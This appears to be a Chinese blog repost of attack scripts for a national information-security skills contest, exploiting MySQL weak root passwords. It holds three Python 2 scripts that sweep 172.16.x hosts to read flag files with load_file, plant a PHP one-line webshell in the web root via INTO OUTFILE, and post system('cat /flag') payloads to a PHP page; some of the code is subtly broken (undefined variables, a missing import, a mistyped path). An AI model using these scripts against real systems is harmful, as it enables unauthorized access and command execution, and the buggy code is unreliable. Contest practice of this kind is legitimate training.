zoukankan      html  css  js  c++  java
  • 全国职业技能大赛信息安全管理与评估-MySQL弱口令利用

    MySQL读文件

    #coding=utf-8
    import MySQLdb
    host = '172.16.1.'
    for i in range(129,131):
        tag = host+str(i)
        print tag+"3306"
        try:
            MySQLdb.connect(tag,3306,'root','root','mysql',timeout=1)
            cur = conn.cursor()
            cur.execute("select load_file('/root/flag.txt')")
            print cur.fetchone()
            cur.close()
        except:
            print 'MYSQL connect out'
    conn.commit()
    conn.close()

    MySQL写入一句话木马

    #coding=utf-8
    import MySQLdb
    host = '172.16.1.'
    try:
        conn = MySQLdb.connect(host=host,port=3306,user='root',passwd='root',db='mysql',connect_timeout=1)
        cur = conn.cursor()
        cur.execute("""create table sys(cmd text NOT NULL);""")
        cur.execute("""insert into sys(cmd)values("<?php system('cat /root/flaginfo*');?>");""")
        cur.execute("""select * from sys into outfile "/val/www/html/sys.php";""")
        os.system("curl "+tag+"/sys.php")
    except:
        print 'Mysql time out'

    webshell利用

    #!usr/bin/python
    import urllib,urllib2
    for i in range(1,10):
        tag = 'http://172.16.'+str(i)+'.113/add_book.php'
        data = {"password":"system('cat /flag');"}
        print tag
        try:
            f = urllib2.urlopen(url=tag,data=urllib.urlencode(data),timeout=1)
            flag = f.read()
            print flag[0:40]
        except:
            print 'time out'
  • 相关阅读:
    Eclipse在线集成maven M2eclipse插件
    RBAC用户权限管理数据库设计
    Linux下修改mysql密码
    Red hat 6.4下面的qt安装
    export default {} 和new Vue()区别
    Ajax中POST和GET的区别
    JS es6-Symbol
    JS es6编程规范
    JS之箭头函数
    JS异步加载的方式
  • 原文地址:https://www.cnblogs.com/nul1/p/10991078.html
Copyright © 2011-2022 走看看